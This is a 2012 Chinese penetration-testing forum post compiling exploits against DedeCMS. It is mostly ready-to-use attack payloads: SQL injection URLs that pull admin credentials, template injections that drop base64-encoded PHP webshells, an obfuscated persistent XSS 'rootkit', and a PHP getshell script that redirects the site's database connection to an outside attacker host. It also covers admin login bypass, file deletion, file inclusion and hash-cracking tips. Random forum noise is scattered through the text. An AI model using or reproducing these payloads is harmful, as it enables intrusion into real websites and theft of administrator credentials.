中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结

. E" A8 l, Z; C" V  ?Dedecms 5.6 rss注入漏洞6 Q6 ?' o$ O; c" k$ I  \  T
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
7 |" V  F3 ^. ~" B# C" d6 I7 Z2 \, ^- d) o, V% B: Z( u# X9 V0 A

! f# L, e: G' b0 B0 j- u8 {5 |: j/ R4 e; f! Q. h
- P. x6 N0 H( d; c
9 k( h( K3 m, h: }  Z
( }7 o  _' s4 S7 O: e/ A

- a3 z; f- O3 P& r( W: R/ v! }7 o  ]4 L+ x' W
DedeCms v5.6 嵌入恶意代码执行漏洞
9 z# r2 A9 Q; }. ]% ]注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
; n) o, r: r1 H0 F发表后查看或修改即可执行
0 P8 L5 v6 y0 \+ x) ma{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}# p2 |3 k( i3 o2 o% L
生成x.php 密码xiao,直接生成一句话。
% M+ A7 U  O( _- D" Z3 j% @$ b5 U; r+ d0 T, d  b1 J6 {

; K  n$ q, x1 F7 u0 P8 `% R
( i! g1 V: K$ H3 w- i3 E4 W' N; C5 X" `, E$ K2 ?# X, Y. i6 h
& P( f9 ~' j; b. F, J" {9 J
7 \: Q; h+ r9 r( X
8 K* }4 D% m( d! T9 @* O8 _' C

9 Q6 ^) o# D) I4 T9 DDede 5.6 GBK SQL注入漏洞
: m% n! c9 f, t: zhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
. y4 V$ ^2 f5 ^9 l6 s! a' d0 u# A" Lhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
4 h" _/ C$ \7 B6 Q7 X/ J5 g4 d# }. hhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7! c/ ?8 k* }2 U2 l4 T+ S7 q: c

0 e+ T: u3 i" E# W
$ \" h. o( Y. c* |/ h7 P1 u( M$ r, I0 b1 f: \& d' g6 u

3 S# Y0 P+ @4 g* ^% M& H. }3 S) n+ Q" m3 t  X/ P
$ F/ V1 f. I- i+ Z# @) ?8 V' _! |5 F
2 ~2 u9 x. }; c: @: Q! C% I. f

, t8 h( }1 C  r# P; nDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
" R% b( m# o1 m, |( Qhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 7 i5 y# k* @; v' \' g2 _+ z

8 l) w' T& }4 c6 u, H* ~6 w/ ]- f6 y- Q) I

7 j  u1 o( c: [5 \. M- |, g
, ?- r" _9 n2 g/ Q  T: M9 E5 ^+ J3 r3 v' n( z, Q9 m. a
) X  P4 H4 ?8 R: Y6 @
DEDECMS 全版本 gotopage变量XSS漏洞1 a/ k& m/ E% `8 Y/ g
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 + {, @/ N: z5 j. ~; h! f
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="9 T- W4 d2 L8 F- P2 [5 _5 F8 t

$ Q& u; L9 y3 q( k$ W
" k4 ]0 Q2 E" M3 m$ W6 D2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
5 D' i1 U8 y) u+ X. vhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
; e! m! X7 a) k3 y
3 ~, Q8 ]$ E: B1 m! x/ p# u& n0 A- Y$ O; ?* @
http://v57.demo.dedecms.com/dede/login.php
3 Y$ `: y$ g" ], R6 q! Q/ A: G) R8 N1 U) t5 k; O$ q

1 g2 d( S" Z* U" i) Q' h$ ~6 c3 \color=Red]DeDeCMS(织梦)变量覆盖getshell
0 B: `1 b# z0 L) o  }; A$ c#!usr/bin/php -w8 [8 b* @! u* e
<?php
5 d6 s4 J- H& H. I2 ]* A7 D$ Derror_reporting(E_ERROR);
6 L5 g5 c: u( h' Yset_time_limit(0);- @: x$ P8 ~9 ~: O# |/ H! T
print_r('
7 j2 o1 W0 K5 K6 R: x2 ~+ ADEDEcms Variable Coverage
( z" Y' ^/ ?2 _9 V3 ~1 c% iExploit Author: www.heixiaozi.comwww.webvul.com
  S% H% u) V! M4 d);
" N  n$ Z. z: c" a, n. B% t8 eecho "\r\n";* T7 j8 i% B# v
if($argv[2]==null){1 o, j9 U2 U  \, w. ]
print_r('6 X8 r. F+ d. R1 @
+---------------------------------------------------------------------------+
3 ]- `4 K( ]% |0 A6 V5 j) OUsage: php '.$argv[0].' url aid path
- T# x: Y. _" e% G- f1 Oaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
# c/ _5 e  ~  nExample:
$ `$ o2 X6 _& \7 p% t: K5 n+ Kphp '.$argv[0].' www.site.com 1 old4 h5 a+ g( _, n! v% X3 M- \8 V
+---------------------------------------------------------------------------+! i# W! ]; C3 r+ F( v' _% J( l
');# i, `9 x0 @, p8 j* T2 N
exit;1 v7 ^% P) H& j& \( k
}( p1 p; V2 c  t: M% Q
$url=$argv[1];6 A8 e8 E! `; s- B3 g  G
$aid=$argv[2];
, U! }% z9 ~# [) C1 C$path=$argv[3];
% V& c, U: c2 O' p+ N% H$exp=Getshell($url,$aid,$path);
: `* V0 y' l6 R3 S2 oif (strpos($exp,"OK")>12){
  d) b' X! ^  n: c% G( J  cecho "+ t( n- V8 z; M0 F
Exploit Success \n";
' t* P8 U: P; _  N8 [: Lif($aid==1)echo "
' W7 b  i3 g& g. T4 aShell:".$url."/$path/data/cache/fuck.php\n" ;7 O4 o' u, |9 U4 Z7 Q0 u

0 M0 ?" y; Y: l* \9 v
) V7 A: T* e6 cif($aid==2)echo "
9 D! Q1 d6 d8 J2 q. @1 JShell:".$url."/$path/fuck.php\n" ;  L0 Z& G- d2 B7 I$ z0 f
% C/ Y" f4 _2 p4 @3 B

$ y$ j% c; R9 x' h! {4 }) ?; Uif($aid==3)echo "' \- o: ^4 p4 T7 |  W" D
Shell:".$url."/$path/plus/fuck.php\n";) a7 b  `, r9 p) s! X% r
/ M3 `9 F4 X; x2 Z8 E3 x, j$ J

/ z, f; H8 u8 ?* _) y+ }5 x}else{
, }7 {4 v8 T. K* _0 _echo "
2 ]' `8 y0 b9 X, I& }$ E- k# c: Y  `Exploit Failed \n";
/ E5 a1 {( A2 W! {- X7 J! V+ W3 }}0 P8 D: o1 i! o/ _& Y/ U( D
function Getshell($url,$aid,$path){
5 p$ e3 }1 L' }$id=$aid;. y9 P% T1 _. q' W
$host=$url;
8 o- i' _: v3 B: Q  _9 r4 ~3 f$port="80";4 @0 `3 V6 H( f$ _7 y1 H2 A& ]/ {* C
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
9 h+ p4 i+ e  }0 M$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$ g! f0 E! K! W& i1 q$data .= "Host: ".$host."\r\n";- o" S" P' p1 E2 p) Y9 J
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
; O. H$ \! ^* F2 l% q# s, j6 D$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";  H: l) O% v( C" n* B. |. B
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
  `7 N# |5 `3 S! i0 G) K//$data .= "Accept-Encoding: gzip,deflate\r\n";
% @% Q5 ], p/ z* p4 h$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
! ]* q* w6 R3 I9 V! q1 O$data .= "Connection: keep-alive\r\n";5 _) ]8 M& B* X4 B
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";  _) N& b: j  P
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";3 @+ e9 q. F4 D2 m- i5 A
$data .= $content."\r\n";
4 d4 A* N9 S: ~; T8 B9 r, J$ock=fsockopen($host,$port);
; [5 g1 s) j4 l+ S! W/ {if (!$ock) {
$ E7 J8 G" k: l4 M! ^" jecho "
5 C/ z% R' H3 U" E6 I! oNo response from ".$host."\n";* s6 v. ]. A2 \  A0 {
}% J# ]9 M# a+ x( Q& m
fwrite($ock,$data);
  I0 B! z- _- uwhile (!feof($ock)) {
* }" }1 j0 ~" H! a) l$exp=fgets($ock, 1024);
3 B" s: P- ^" r9 P" G, M9 Lreturn $exp;/ _- u; C3 b9 h# w
}) [! w8 o0 S9 e) a! t* ^
}% b# _" g, C3 @+ k  i- E6 V* q! `

/ m/ o3 z+ \+ G. C
9 e6 a2 G: ]4 n4 p" Z/ v?>  M2 \9 K! J9 {4 E
: }7 \& _8 F3 t
3 X- a: i& |1 y$ O
* `) L2 s+ I& @  {! [

: H* O% @" f3 N0 r+ U+ S2 S2 ?$ e* u1 p' r. E( P  x; K6 Z

+ n, F. `+ U- ]' _5 z: U3 t( w6 Y( S

( q# \" d) Z+ ~- z) M  o; i, m* L2 Q  \

' @$ u! K& o0 s, ODedeCms v5.6-5.7 越权访问漏洞(直接进入后台)6 ]" G/ }2 t9 e. k' L: P: D
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. q8 p4 R! W+ y6 i3 P; ~
2 `2 r. L4 g% }7 F. W
3 I3 U1 E! N: Z! F
把上面validate=dcug改为当前的验证码,即可直接进入网站后台% F# p' j# ]; K/ a# U

3 }& ~/ ]. D- X! @7 U8 O+ i
: d1 z8 {% P& q9 r; d9 l此漏洞的前提是必须得到后台路径才能实现  E* n; [' [5 n

% |8 L3 |7 H  g: m, ^2 D2 |' Y. W3 F# w# e1 P$ }% q5 r2 F
$ b' K1 T6 G0 w3 `$ Z' b+ ]

4 Y! b5 o; k, R8 u+ a" D* b3 w% h0 T

% V( n: |& u- _/ A. e$ d' _# }$ U$ @
+ s& Z2 d) j) ^- z8 k) V% ~

$ |3 R4 E: z) Y5 |' ]- d9 z1 A+ y5 `% |2 F- r! [7 e
Dedecms织梦 标签远程文件写入漏洞% ~- }, V1 c1 }3 F' T* I
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
* \% k  l0 _7 D' r# M" C$ Q: g6 r+ k# ]7 `) u. u

: Z/ @8 Z+ a# [$ t6 l% Q$ G再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 ! I3 V9 P& y6 h
<form action="" method="post" name="QuickSearch" id="QuickSearch">5 N% S$ B, M3 t$ _6 ]* ~0 \# h
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
* d+ {8 ]2 ?7 l9 Q; T7 @3 H+ k<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />* P! x8 O1 ?! o( T  j5 s
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /># g* i& J0 a& L
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />( |* I$ o1 G& u$ b" S% r
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
3 }4 v* j- a. K: s0 w2 D! O' n<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
5 d% f: l7 U2 M<input type="text" value="true" name="nocache" style="width:400">8 w+ B! |5 p, I' L' b
<input type="submit" value="提交" name="QuickSearchBtn"><br />
3 J6 l4 S0 j% U( r</form>
$ m& w" Y# [! i; L+ }! j<script>
+ C' b# ~2 o  \( R  {* A( M7 Nfunction addaction()
) B, N2 @1 d. o: ?9 d8 W/ R1 d{  ]0 |' V% O  e! w: `! o$ I
document.QuickSearch.action=document.QuickSearch.doaction.value;
0 B2 K( Z2 V; |$ P& G% e0 @4 W}  {$ N$ @2 ]. E, {) l
</script>' r$ _/ c- O" ~. l- J( ?8 u
' Q3 m# Z2 b4 M  z# |6 `
0 E+ F9 U# x% Q
- L1 G0 M/ W" J& _+ R
6 V: _! r3 i( \
( L7 P, u% ^/ {! }
0 |2 e% R& J& `4 [

- ?; n# ~- c2 F- I% C6 n- b7 ~1 Y# v, o( t# _! I) |

8 ^; b+ I# E  N! V! e5 S5 Y& q' |8 ?6 T: q, l
DedeCms v5.6 嵌入恶意代码执行漏洞
; @  f8 j6 n0 }7 `注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行1 x/ G# t, N/ u* x  q9 J  V
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}  P: I2 D6 e8 I
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得" f) U/ S, r1 {" b  V
Dedecms <= V5.6 Final模板执行漏洞& D2 r) u/ ^1 Z5 Z, a8 n
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:; D8 Y+ S" j; x
uploads/userup/2/12OMX04-15A.jpg/ Z6 ~& O% i  @, J+ @- H( [6 ~
7 E# w# N& P  k1 S! |

6 l3 i6 H* |4 A; ?0 _5 S模板内容是(如果限制图片格式,加gif89a):4 ?! N0 y( o7 f3 J
{dede:name runphp='yes'}" M5 t7 Q. x+ m' ~- p9 _& l
$fp = @fopen("1.php", 'a');, t0 Z4 z' W% B
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");0 A7 N6 f* F4 I5 x2 R7 G
@fclose($fp);9 g2 m, B$ X. j
{/dede:name}9 w3 I5 u2 u* @7 W* s
2 修改刚刚发表的文章,查看源文件,构造一个表单:8 h" s9 ~; [- E$ \0 T
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
0 ^8 Y( e  q: M) n" |: B6 I<input type="hidden" name="dopost" value="save" />
; e0 t! I! Y3 N5 ~5 R- E<input type="hidden" name="aid" value="2" />; Z! `3 n. \  @7 J1 b
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
5 \* o6 ^% X' m& z) L+ @<input type="hidden" name="channelid" value="1" />: y8 S& T. Y6 _3 e
<input type="hidden" name="oldlitpic" value="" />, V. d1 V/ ^3 {- U
<input type="hidden" name="sortrank" value="1275972263" />
. @- l5 y; b1 ~% Q! ~4 K) z& L  @+ Q

4 J! `+ R* C, E9 T# l<div id="mainCp">
4 C5 r3 ?6 [7 L5 o- _<h3 class="meTitle"><strong>修改文章</strong></h3>
; A0 t, }- j5 Z) h- p; |5 y" C* ]" t9 x' F  x/ A; o

' i; n+ x5 O: B- ~<div class="postForm">6 ]+ L3 l- {( F# V
<label>标题:</label>6 c1 q' L: m' D  N4 ]9 T
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>5 o1 P2 D2 |3 @; l" p0 {

3 Q! Y$ Z! b$ Q1 W) o: p- A0 k0 v8 S
! V. l& }, e8 m# v2 j<label>标签TAG:</label>' x: [) O: D" ?# Y# X2 g1 l
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)# t7 l  y+ ^" w4 {

  S% E- t# ?: S) e: y
0 R( D* _4 u4 ?' f& F- \$ |/ }4 R0 Y<label>作者:</label>
) Z0 J% n4 o( w9 s% |5 p$ V- q* e<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
$ g* ?0 {/ W4 k7 \- d) B5 k; E- A; I' n$ a7 Y1 e6 k

! t5 m  j9 B5 b0 a8 `<label>隶属栏目:</label>( }: T' m9 ~# h0 _
<select name='typeid' size='1'>2 w0 R& F) p  X1 r7 a7 }; k* U
<option value='1' class='option3' selected=''>测试栏目</option>
! J0 y! h6 R7 j, u</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
2 s0 k  r, m; k1 v; ]- `
# c" W4 t* e: }5 G# _" H! p0 S' Q8 r) C1 K$ O
<label>我的分类:</label>
  t% j2 s: E& A, ~! H<select name='mtypesid' size='1'>
: d" ~' }, T) D7 u<option value='0' selected>请选择分类...</option>9 m2 u  _$ T) \6 u  M  b/ h
<option value='1' class='option3' selected>hahahha</option>
- N- O5 n* }8 A8 B+ b</select>
2 `& g/ `. X$ U1 p5 \9 O# A" G. y9 L3 N7 {
$ m. c7 r4 }" K+ F
<label>信息摘要:</label>* A" D/ q5 o! q
<textarea name="description" id="description">1111111</textarea>
* j4 e# I9 Y# C& j2 L* K(内容的简要说明)
& Q9 R; C$ L/ [8 L% b* Z) _
, N+ U: f. i8 ~
0 a$ N9 ?! p7 t) u) o<label>缩略图:</label>
% g4 g0 A: V8 B5 Y( e$ r, U6 v<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>  N4 d9 a6 }6 ^! \/ E7 {
4 z+ c1 o9 U$ F( j

3 M- w/ n. k0 [<input type='text' name='templet'
) q/ A! F$ v8 C# ]7 {# hvalue="../ uploads/userup/2/12OMX04-15A.jpg">
2 K9 f% {: S2 k<input type='text' name='dede_addonfields'
/ f4 F4 n9 l  Z- J. v7 Bvalue="templet,htmltext;">(这里构造)6 e% u, L) O* G2 ~/ H8 |8 `* k
</div>) T6 Q' I2 g. k: R
3 v- w, Q0 S4 {/ j2 m% T$ E
% D, ^1 E  g) J/ A1 M
<!-- 表单操作区域 -->
7 F0 |6 p5 Q1 M" ~  T8 x8 M<h3 class="meTitle">详细内容</h3>
+ n1 J/ X% @3 v- c6 K( z: ^4 z5 R6 v9 J- d8 y+ d
7 d% W& E, F; _4 c- X" W
<div class="contentShow postForm">. Z9 }6 S% i  g0 I
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
" p7 _: H; q( Y6 q9 g% f' y0 e6 R" V1 X# k( i
* Z  `6 q. H' Y6 ^2 v% r8 X
<label>验证码:</label>) b) Z8 ]( ~# G) c- v! Y* D
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
' d' D% _, }% U1 U0 G. k) z<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />& X9 C- o) D8 t

( b( L  l8 |- o1 Q6 w
6 }: w- K+ J8 p' Q5 z<button class="button2" type="submit">提交</button>
# Z8 f$ S" O2 Y9 e! Y) p<button class="button2 ml10" type="reset">重置</button>% H) t1 \7 Z/ ~7 E
</div>. u! s6 C, l5 M3 H3 A! o# z) I& ~
6 c3 \) O0 K" S" w& f! R1 |; E  e

  s- U8 o3 n  K! ~</div>* G% @8 ?/ m% t7 Y- d. H
! w1 h. Y5 T) j) _( A, s

& ?4 T2 H  X, @3 v</form>1 o/ {- c% Y% M1 ?
3 R1 n5 K: l* {' o

! }% _7 T2 n3 A2 z+ N提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:- G( `4 j3 f. t' k* e
假设刚刚修改的文章的aid为2,则我们只需要访问:# p0 C0 z. p- C$ R0 c8 ~; y6 o
http://127.0.0.1/dede/plus/view.php?aid=2/ i% C* B# \1 I& }) E
即可以在plus目录下生成webshell:1.php
; u4 U; f  u, ?2 P
6 r* j* y0 G/ _2 b+ `" B5 t* X) B+ t3 X( W( M: K- m  ^+ h$ a/ k
( Z7 Q( r- a. V7 w/ |
/ d, r, S" h" o3 S$ l5 ?- `2 E

8 X' g& l7 l- c2 I
* L, C* N' K- }0 @2 L* a8 L. l8 [- q& K
3 {, x0 a  F0 p3 ^
. E9 R" }6 X& i7 D
4 f- q9 i- u' N/ m
" F, k* p$ ]& v7 ]3 `5 ^6 C! O% W
2 D! e& D" o' }
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
! u9 u5 Y, \3 A' X2 k: l4 j/ kGif89a{dede:field name='toby57' runphp='yes'}- |# M/ e3 [( T/ O# J, W
phpinfo();' z5 t" p, K- ?' \0 W
{/dede:field}
3 I$ b  p( Y6 r保存为1.gif
4 f& n. t  I: B" _8 m3 f: y<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 0 }2 s# j5 ~" Y& k  p
<input type="hidden" name="aid" value="7" /> % q7 G5 f4 K: H  c1 T% F: {
<input type="hidden" name="mediatype" value="1" />
( [( H6 j& m$ q1 G<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
7 [: ~* j6 b2 j' B. g* c  n* p/ U<input type="hidden" name="dopost" value="save" /> . U8 O; r: G% Q6 w2 j- B3 M
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> . ~4 a+ R9 ]3 ?0 ]) i- ?
<input name="addonfile" type="file" id="addonfile"/> 0 c" n' x+ S  D) h. H- @
<button class="button2" type="submit" >更改</button>
& r$ }/ R2 f& r4 n! U9 }, r</form>
" S& U4 I8 u+ l; w/ z% }/ u' Y$ `3 u' ?  X2 @

' _4 r) G( S% u* i2 H" \构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
2 A1 a2 e7 w5 e4 r- q1 ~发表文章,然后构造修改表单如下:
6 K/ h3 I3 x* K* X
# z7 J( y) k) H' U6 \  B3 G7 v2 i
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
# ?# n% D$ ~$ s% ^4 g9 A<input type="hidden" name="dopost" value="save" /> " O0 X' h) e* j3 N) k
<input type="hidden" name="aid" value="2" /> / ^6 V* b* k9 D
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
7 F9 U+ U) I% A- @% J<input type="hidden" name="channelid" value="1" />
$ B; r8 V' ~0 i  d<input type="hidden" name="oldlitpic" value="" />
4 Z; v" v0 i- Q- R* T+ O) u  }9 k$ n<input type="hidden" name="sortrank" value="1282049150" /> 2 }( Z; n8 @6 m5 H. F+ ~: {2 r, }
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ' r# B) u2 b8 y3 q
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 9 m0 R' J( ^2 z! Y5 Z2 m. j) K) u
<select name='typeid' size='1'>
# b7 Z" V7 T5 |6 R- s4 y( t  [<option value='1' class='option3' selected=''>Test</option>
& X  i+ [; h( m. n# b<select name='mtypesid' size='1'> / E- B- Y; O, E% {1 _' T! C' e! V
<option value='0' selected>请选择分类...</option> " O. k" o8 N" t! V% a; d8 d
<option value='1' class='option3' selected>aa</option></select> 7 s- ~9 B- a0 G; Y* A3 L$ D+ x- }7 w
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 5 j- ~2 B, C, @. \" x, k. V
<input type='hidden' name='dede_addonfields' value="templet"> + K3 a. p9 J( I* `  e
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> # A" ~) R. Y( {% }8 J, p) }
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 8 p" }7 g2 v% I1 x
<button class="button2" type="submit">提交</button> 1 @, j# o2 c7 h
</form>
0 b/ q0 \! p, P: e  A8 }+ i6 x, t7 @" h  f. G2 T
# l$ M3 J8 _  F

; K7 K. E: @/ w/ l; c* l4 Z9 T' R- I5 X( G. M

, [+ F8 F* C+ P
% K; d5 B: d/ k- S+ t! w% m) O* l. F% J9 f' w

/ ]( _% w+ G& F+ ^7 i4 s  j
( s6 [+ p5 ]) A9 ?
# ?+ R$ `  `7 ~) U$ V% \
2 S4 b2 u4 k% V& M
0 D( M. K; l& q织梦(Dedecms)V5.6 远程文件删除漏洞2 ]3 q& w. H- v& r$ D5 H- N5 f
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif3 Y+ _+ I1 e+ F$ Y; X% P

! U: F' L! {/ m& h! U5 ]6 ?' F4 ]7 L
: E4 ]( m1 T: d: I: m7 {
9 C) Q" v8 E; j5 l1 E; Z5 h& H  U

$ L  z  |! [; A- s) u$ k! I& |
$ l6 N0 |1 |$ w2 L0 Q- n; m. U6 W% c. f. [

- N, d: T( z# l8 K% u$ P
% t) I& y8 e/ k5 f: v: ?0 ?0 b+ M9 a' e1 n1 F3 X
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 & l# `3 Z! w' i, _  U$ N' d  u
http://www.test.com/plus/carbuya ... urn&code=../../, V5 J! Z- A, }# Z# I5 l

! F8 _8 ]" H( e* Q! a) s* Z/ H8 r& r8 a. M
! S8 h7 O# k2 f3 k9 ~

  o# i' T% x' u+ t. k/ l
7 i3 U7 D* k& u1 m) m) j% G
: |+ {# L& ?2 ^; |- E, D' T7 K" a1 F7 c/ f# r9 ~% Q
( J! Y4 x- C! v# P6 F+ Q

$ r- H" E$ J% A2 H0 K. f9 X+ {, w4 n
2 f8 W/ K( D9 o+ K# `1 E. WDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 . `# i" |, L  h& G+ I/ j' d9 V
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
6 ?2 f5 ?+ X  e* C" B) a) |密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD56 [8 w& Q2 T) k4 T$ z# }9 s# \
1 v4 O; z5 e+ Z* S, n8 i  O4 U
; M# g" b: k0 |: ~9 x4 o
" E9 q: x9 H: t3 A3 N
8 [7 z' T% l. ?  f/ f; t% ?
2 ^! a: }3 [% y* N! Z
* D+ P8 j+ o/ {4 O- V

4 o' Q6 z7 i9 M) a3 X" |( ]) R2 G: _3 n' B0 N

- G/ n# }9 a( V8 O/ L* v. @! ~  k$ p: u
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞% c# v4 B1 a* B2 ~. |3 R3 y/ e9 L5 h
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
- |% o) |7 @- q* M3 ]4 F* [/ _  U3 d: b2 {; K# S& Y
, l8 ]% l/ A: P! @

6 f2 S# p) S. j% `3 M+ P9 O6 J4 ^8 ^+ a; X# t
& ~( }% G2 N$ s+ |) y

) _! T! E6 P5 E% C- n- H2 ^, W' d5 }/ e6 \

. I4 @! f3 c" B3 R8 F  B
